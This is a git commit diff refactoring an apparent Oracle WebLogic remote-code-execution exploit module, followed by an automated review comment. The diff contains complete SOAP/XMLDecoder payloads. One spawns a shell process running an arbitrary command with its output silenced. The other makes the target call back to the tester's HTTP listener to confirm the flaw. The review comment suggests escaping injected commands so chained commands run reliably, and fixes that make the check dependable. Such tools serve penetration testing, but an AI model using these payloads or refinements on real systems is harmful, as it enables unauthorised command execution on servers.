Notes fixed and tested

This commit is contained in:
Vakaris 2018-08-25 17:56:43 +03:00
parent 39bb41ed25
commit 307a7c396c
2 changed files with 77 additions and 67 deletions


@ -191,7 +191,8 @@ class Configuration(object):
# TCP Scanner # TCP Scanner
HTTP_PORTS = [80, 8080, 443, HTTP_PORTS = [80, 8080, 443,
8008, 7001 # HTTP alternate 8008, # HTTP alternate
7001 # Oracle Weblogic default server port
] ]
tcp_target_ports = [22, tcp_target_ports = [22,
2222, 2222,


@ -17,11 +17,11 @@ import logging
__author__ = "VakarisZ" __author__ = "VakarisZ"
LOG = logging.getLogger(__name__) LOG = logging.getLogger(__name__)
# How long server waits for get request # How long server waits for get request in seconds
SERVER_TIMEOUT = 4 SERVER_TIMEOUT = 4
# How long to wait for a request to go to vuln machine and then to our server from there # How long to wait for a request to go to vuln machine and then to our server from there. In seconds
REQUEST_TIMEOUT = 2 REQUEST_TIMEOUT = 2
# How long to wait for response in exploitation # How long to wait for response in exploitation. In seconds
EXECUTION_TIMEOUT = 15 EXECUTION_TIMEOUT = 15
URLS = ["/wls-wsat/CoordinatorPortType", URLS = ["/wls-wsat/CoordinatorPortType",
"/wls-wsat/CoordinatorPortType11", "/wls-wsat/CoordinatorPortType11",
@ -55,40 +55,10 @@ class WebLogicExploiter(WebRCE):
return exploit_config return exploit_config
def exploit(self, url, command): def exploit(self, url, command):
empty_payload = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3" >
<void index="0">
<string>{cmd_base}</string>
</void>
<void index="1">
<string>{cmd_opt}</string>
</void>
<void index="2">
<string>{cmd_payload}</string>
</void>
</array>
<void method="start"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
'''
if 'linux' in self.host.os['type']: if 'linux' in self.host.os['type']:
cmd_base = '/bin/sh' payload = self.exploit_payload('/bin/sh', '-c', command + ' 1> /dev/null 2> /dev/null')
cmd_opt = '-c'
command += ' 1> /dev/null 2> /dev/null'
else: else:
cmd_base = 'cmd' payload = self.exploit_payload('cmd', '/c', command + ' 1> NUL 2> NUL')
cmd_opt = '/c'
command += ' 1> NUL 2> NUL'
payload = empty_payload.format(cmd_base=cmd_base, cmd_opt=cmd_opt, cmd_payload=command)
try: try:
post(url, data=payload, headers=HEADERS, timeout=EXECUTION_TIMEOUT, verify=False) post(url, data=payload, headers=HEADERS, timeout=EXECUTION_TIMEOUT, verify=False)
except Exception as e: except Exception as e:
@ -96,7 +66,7 @@ class WebLogicExploiter(WebRCE):
print(e) print(e)
return True return True
class HTTPServer(threading.Thread): class IndicationHTTPServer(threading.Thread):
""" """
Http server built to wait for GET requests. Because oracle web logic vuln is blind, Http server built to wait for GET requests. Because oracle web logic vuln is blind,
we determine if we can exploit by either getting a GET request from host or not. we determine if we can exploit by either getting a GET request from host or not.
@ -109,6 +79,7 @@ class WebLogicExploiter(WebRCE):
self._stopped = False self._stopped = False
self.lock = lock self.lock = lock
threading.Thread.__init__(self) threading.Thread.__init__(self)
self.daemon = True
def run(self): def run(self):
class S(BaseHTTPRequestHandler): class S(BaseHTTPRequestHandler):
@ -132,43 +103,81 @@ class WebLogicExploiter(WebRCE):
def check_if_exploitable(self, url): def check_if_exploitable(self, url):
# Server might get response faster than it starts listening to it, we need a lock # Server might get response faster than it starts listening to it, we need a lock
lock = threading.Lock() httpd, lock = self._start_http_server()
local_port = get_free_tcp_port() payload = self.test_payload(ip=httpd._local_ip, port=httpd._local_port)
local_ip = get_interface_to_target(self.host.ip_addr)
httpd = WebLogicExploiter.HTTPServer(local_ip, local_port, lock)
httpd.daemon = True
lock.acquire()
httpd.start()
lock.acquire()
generic_check_payload = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8" class="java.beans.XMLDecoder">
<void id="url" class="java.net.URL">
<string>http://{lhost}:{lport}</string>
</void>
<void idref="url">
<void id="stream" method = "openStream" />
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
'''
payload = generic_check_payload.format(lhost=local_ip, lport=local_port)
try: try:
post(url, data=payload, headers=HEADERS, timeout=REQUEST_TIMEOUT, verify=False) post(url, data=payload, headers=HEADERS, timeout=REQUEST_TIMEOUT, verify=False)
except exceptions.ReadTimeout: except exceptions.ReadTimeout:
# Our request does not get response thus we get ReadTimeout error
pass pass
except Exception as e: except Exception as e:
LOG.error("Something went wrong: %s" % e) LOG.error("Something went wrong: %s" % e)
self._stop_http_server(httpd, lock)
return httpd.get_requests > 0
def _start_http_server(self):
lock = threading.Lock()
local_port = get_free_tcp_port()
local_ip = get_interface_to_target(self.host.ip_addr)
httpd = self.IndicationHTTPServer(local_ip, local_port, lock)
lock.acquire()
httpd.start()
lock.acquire()
return httpd, lock
def _stop_http_server(self, httpd, lock):
lock.release() lock.release()
httpd.join(SERVER_TIMEOUT) httpd.join(SERVER_TIMEOUT)
httpd.stop() httpd.stop()
if httpd.get_requests > 0: return True
exploited = True
else:
exploited = False @staticmethod
return exploited def exploit_payload(cmd_base, cmd_opt, command):
empty_payload = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3" >
<void index="0">
<string>{cmd_base}</string>
</void>
<void index="1">
<string>{cmd_opt}</string>
</void>
<void index="2">
<string>{cmd_payload}</string>
</void>
</array>
<void method="start"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
'''
payload = empty_payload.format(cmd_base=cmd_base, cmd_opt=cmd_opt, cmd_payload=command)
return payload
@staticmethod
def test_payload(ip, port):
generic_check_payload = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8" class="java.beans.XMLDecoder">
<void id="url" class="java.net.URL">
<string>http://{host}:{port}</string>
</void>
<void idref="url">
<void id="stream" method = "openStream" />
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
'''
payload = generic_check_payload.format(host=ip, port=port)
return payload
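Review bot: `exploit_payload` (last hunk) interpolates `cmd_base`, `cmd_opt` and `command` into the SOAP envelope with `str.format` and no XML escaping, so a command containing `&` or `<` (e.g. `cmd1 && cmd2`) yields malformed XML that the target's parser rejects, while `exploit` still returns True because it returns True whether or not the POST succeeds. Escape each value before formatting: `payload = empty_payload.format(cmd_base=escape(cmd_base), cmd_opt=escape(cmd_opt), cmd_payload=escape(command))`, with `from xml.sax.saxutils import escape` added to the module imports; `test_payload` has the same issue only in that an IPv6 `ip` would need brackets to form a valid URL. Separately, `check_if_exploitable` treats any GET as proof (`httpd.get_requests > 0`); if the handler in `IndicationHTTPServer.run` (its body lies outside this hunk) does not compare `client_address` with `self.host.ip_addr`, an unrelated client reaching the listening interface produces a false positive. Also, the second `lock.acquire()` in `_start_http_server` has no timeout, so if the server thread fails to bind (the port from `get_free_tcp_port` can be taken before use) and never releases the lock, the scan hangs; `lock.acquire(timeout=SERVER_TIMEOUT)` would bound that wait.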